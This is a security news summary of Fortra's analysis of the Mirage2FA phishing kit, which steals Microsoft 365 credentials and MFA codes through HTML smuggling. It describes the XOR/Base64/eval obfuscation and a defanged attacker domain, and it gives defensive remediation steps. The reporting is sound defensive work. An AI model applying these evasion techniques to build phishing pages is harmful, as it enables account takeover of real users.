Mirage2FA phishing kit steals Microsoft 365 credentials via HTML smuggling
▼ Summary
– Fortra identified Mirage2FA, a phishing kit that uses HTML smuggling and obfuscated JavaScript to deliver fake Microsoft 365 login pages and steal credentials during MFA prompts.
– The campaign used business-themed email lures, such as secure documents and payment requests, to trick users into opening the malicious HTML attachment.
– The initial HTML payload employed obfuscated JavaScript with Base64, XOR encryption, and eval() to hide its behavior and load a second-stage script from attacker-controlled infrastructure.
– The second-stage phishing page mimicked Microsoft 365 sign-in with a fake CAPTCHA, credential fields, and prompts for multiple MFA methods, including authenticator apps and number matching.
– Fortra advised that affected users should reset passwords, revoke sessions and tokens, review MFA methods and mailbox rules, and check OAuth grants to mitigate account takeover risks.
A newly identified phishing kit, tracked as Mirage2FA, is targeting Microsoft 365 users by combining HTML smuggling with obfuscated JavaScript to steal credentials, even when multi-factor authentication is active. Researchers at Fortra uncovered the campaign after analyzing a suspicious HTML and JavaScript email attachment, supported by DNS data and the final phishing page.
The attack chain begins with business-themed lures, such as secure document notifications, remittance services, automated billing requests, and payment alerts. Once a user opens the HTML attachment, it renders a Microsoft-branded page designed to resemble a protected business document. The initial HTML payload employs obfuscated JavaScript to evade static detection, then decodes and executes hidden code using Base64, XOR with 0xAD, TextDecoder, and eval(). This process loads a second-stage script from attacker-controlled infrastructure at user[.]cheacker[.]store.
The domain cheacker[.]store was registered on March 16, suggesting a short-lived phishing campaign. The second-stage page mimics the Microsoft 365 sign-in flow, featuring a fake CAPTCHA screen, credential fields, and prompts for multiple MFA methods, including authenticator apps and number matching. Fortra’s analysis also uncovered code supporting SMS verification, though that workflow was not confirmed during testing.
“The likely goal is Microsoft 365 account takeover. If a user submitted credentials, the attacker may have been able to access email, files, Teams messages, SharePoint content, and other connected SaaS resources,” the researchers noted.
Fortra identified several indicators of compromise, including the domains cheacker[.]store and user.cheacker[.]store, an associated IP address, and specific JavaScript resources. The researchers recommend that any user who opened the phishing page or submitted information should immediately reset their password, revoke active sessions and refresh tokens, review MFA methods, inspect mailbox rules, and check OAuth grants.
(Source: Help Net Security)
